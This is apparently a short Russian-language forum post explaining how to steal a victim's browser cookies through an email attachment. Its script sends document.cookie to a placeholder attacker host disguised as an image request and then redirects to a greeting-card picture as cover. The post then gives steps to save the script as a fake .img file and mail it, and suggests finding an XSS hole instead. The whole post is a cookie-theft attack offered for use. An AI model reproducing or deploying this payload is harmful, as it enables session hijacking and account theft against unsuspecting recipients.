Это первое :

<script>
img = new Image(); img.src = "http://тут_ставишь_свое.gif?"+document.cook ie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете заменить на свой
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>


Второе :

создаешь текстовый документ, в нем сохраняешь этот скрипт

третье :

расширение текстового док-та ставишь .img

Все прикрепляешь к письму и отправляешь. В мозилле точно не пашет, в опере хз, раньше работала.... сейчас не знаю. Вообще лучше XSS найди и тогда все будет проще.

А вообще это все давно в инете валяется.